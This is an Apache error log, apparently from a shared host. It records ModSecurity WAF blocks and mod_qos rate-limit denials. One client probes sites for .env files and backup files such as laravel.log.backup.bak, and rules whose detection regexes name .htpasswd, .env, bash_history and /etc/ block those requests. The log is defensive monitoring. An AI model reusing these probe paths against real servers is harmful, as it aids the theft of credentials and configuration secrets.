[Tue May 26 19:54:46.033047 2026] [security2:error] [pid 93576:tid 93832] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/rails-app/frontend/.env"] [unique_id "ahWtLmDRMqfxdEDkoszTTAAAAHg"]
[Tue May 26 19:54:46.042037 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LXQAAAZE
[Tue May 26 19:54:46.054933 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFNgAAALo
[Tue May 26 19:54:46.055725 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFNwAAALQ
[Tue May 26 19:54:46.062755 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:60024] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFOAAAAIY
[Tue May 26 19:54:46.231098 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LXgAAAgM
[Tue May 26 19:54:46.232466 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFPAAAAM4
[Tue May 26 19:54:46.233209 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFPQAAAM4
[Tue May 26 19:54:46.233984 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:60006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LXwAAAcY
[Tue May 26 19:54:46.241650 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LYAAAAZ4
[Tue May 26 19:54:46.241994 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFPgAAAPo
[Tue May 26 19:54:46.249306 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LYQAAAfM
[Tue May 26 19:54:46.249652 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:60024] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFPwAAAL8
[Tue May 26 19:54:46.255353 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFQAAAAOE
[Tue May 26 19:54:46.255356 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFQQAAAL0
[Tue May 26 19:54:46.282726 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTBwAAAHU"]
[Tue May 26 19:54:46.290849 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLEqK9k_ZUB2Vp25LJQAAAZc"]
[Tue May 26 19:54:46.298149 2026] [security2:error] [pid 93868:tid 94279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLEqK9k_ZUB2Vp25LHwAAAaQ"]
[Tue May 26 19:54:46.298840 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LEwQAAAJw"]
[Tue May 26 19:54:46.299796 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTAgAAAAk"]
[Tue May 26 19:54:46.304496 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTAQAAAHE"]
[Tue May 26 19:54:46.315720 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTCAAAAF0"]
[Tue May 26 19:54:46.316590 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTFgAAACg"]
[Tue May 26 19:54:46.318378 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTHAAAAFw"]
[Tue May 26 19:54:46.319156 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LEyAAAAPU"]
[Tue May 26 19:54:46.333458 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTDgAAAFU"]
[Tue May 26 19:54:46.352691 2026] [security2:error] [pid 86490:tid 86729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LE1wAAAPI"]
[Tue May 26 19:54:46.353671 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLEqK9k_ZUB2Vp25LKgAAAbQ"]
[Tue May 26 19:54:46.354365 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LE-QAAAKc"]
[Tue May 26 19:54:46.356033 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLEqK9k_ZUB2Vp25LMQAAAek"]
[Tue May 26 19:54:46.360982 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTFwAAAH8"]
[Tue May 26 19:54:46.372888 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LE_AAAALI"]
[Tue May 26 19:54:46.377641 2026] [security2:error] [pid 86490:tid 86672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LFCgAAALk"]
[Tue May 26 19:54:46.383989 2026] [security2:error] [pid 86490:tid 86660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LE-gAAAK0"]
[Tue May 26 19:54:46.386113 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTGgAAAHA"]
[Tue May 26 19:54:46.390023 2026] [security2:error] [pid 86490:tid 86710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LE-AAAAN8"]
[Tue May 26 19:54:46.400419 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLEqK9k_ZUB2Vp25LMgAAAgQ"]
[Tue May 26 19:54:46.408584 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LRAAAAcI"]
[Tue May 26 19:54:46.419876 2026] [security2:error] [pid 86490:tid 86650] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LFAQAAAKM"]
[Tue May 26 19:54:46.430938 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTGQAAAF8"]
[Tue May 26 19:54:46.440462 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LSwAAAZo"]
[Tue May 26 19:54:46.448806 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTGwAAAAc"]
[Tue May 26 19:54:46.448843 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LRgAAAdU"]
[Tue May 26 19:54:46.609310 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFdAAAAPE
[Tue May 26 19:54:46.610037 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFdQAAAIU
[Tue May 26 19:54:46.610402 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLlZMwN0DpLVWo6LFdwAAAJg
[Tue May 26 19:54:46.610915 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFeAAAAI4
[Tue May 26 19:54:46.611338 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtLmDRMqfxdEDkoszTYQAAADg
[Tue May 26 19:54:46.617473 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLlZMwN0DpLVWo6LFfAAAALk
[Tue May 26 19:54:46.617583 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLlZMwN0DpLVWo6LFfQAAALE
[Tue May 26 19:54:46.709551 2026] [security2:error] [pid 93576:tid 93722] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/oauth/.env"] [unique_id "ahWtLmDRMqfxdEDkoszTYwAAAAo"]
[Tue May 26 19:54:46.721207 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:60036] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFhQAAAPI
[Tue May 26 19:54:46.881069 2026] [security2:error] [pid 93576:tid 93794] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/laravel.log.backup.bak"] [unique_id "ahWtLmDRMqfxdEDkoszTZQAAAFI"]
[Tue May 26 19:54:46.956970 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LfgAAAZM
[Tue May 26 19:54:46.958022 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFjAAAALs
[Tue May 26 19:54:46.960782 2026] [qos:error] [pid 86490:tid 86663] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFjQAAALA
[Tue May 26 19:54:46.961015 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLmDRMqfxdEDkoszTZwAAAE8
[Tue May 26 19:54:46.964324 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFjgAAAJc
[Tue May 26 19:54:46.965068 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFjwAAAJc
[Tue May 26 19:54:46.967706 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:49440] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFkQAAAMs
[Tue May 26 19:54:46.969493 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:60036] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFkgAAAJI
[Tue May 26 19:54:46.975285 2026] [security2:error] [pid 86490:tid 86637] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtLlZMwN0DpLVWo6LFbAAAAJY"]
[Tue May 26 19:54:47.106116 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LFkwAAAPk
[Tue May 26 19:54:47.108327 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL0qK9k_ZUB2Vp25LfwAAAe4
[Tue May 26 19:54:47.108836 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL2DRMqfxdEDkoszTaQAAAH4
[Tue May 26 19:54:47.109254 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LFlAAAAMg
[Tue May 26 19:54:47.113272 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LFlQAAAPQ
[Tue May 26 19:54:47.121274 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:60036] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LFlgAAAOM
[Tue May 26 19:54:47.124037 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:49440] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LFlwAAAPE
[Tue May 26 19:54:47.139757 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtL1ZMwN0DpLVWo6LFmAAAALI
[Tue May 26 19:54:47.219225 2026] [security2:error] [pid 93576:tid 93817] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/*.env.test.backup"] [unique_id "ahWtL2DRMqfxdEDkoszTagAAAGk"]
[Tue May 26 19:54:47.277912 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LQgAAAbM"]
[Tue May 26 19:54:47.282726 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LSAAAAa4"]
[Tue May 26 19:54:47.283749 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLWDRMqfxdEDkoszTQwAAAHo"]
[Tue May 26 19:54:47.289856 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLWDRMqfxdEDkoszTRwAAADw"]
[Tue May 26 19:54:47.290408 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LE_wAAAOQ"]
[Tue May 26 19:54:47.290609 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LQwAAAY8"]
[Tue May 26 19:54:47.298670 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLWDRMqfxdEDkoszTMwAAAA4"]
[Tue May 26 19:54:47.300843 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLWDRMqfxdEDkoszTRgAAAEg"]
[Tue May 26 19:54:47.307203 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLVZMwN0DpLVWo6LFDQAAAO0"]
[Tue May 26 19:54:47.319111 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLWDRMqfxdEDkoszTPwAAAEA"]
[Tue May 26 19:54:47.320870 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLUqK9k_ZUB2Vp25LSgAAAfs"]
[Tue May 26 19:54:47.323997 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLWDRMqfxdEDkoszTRAAAAEQ"]
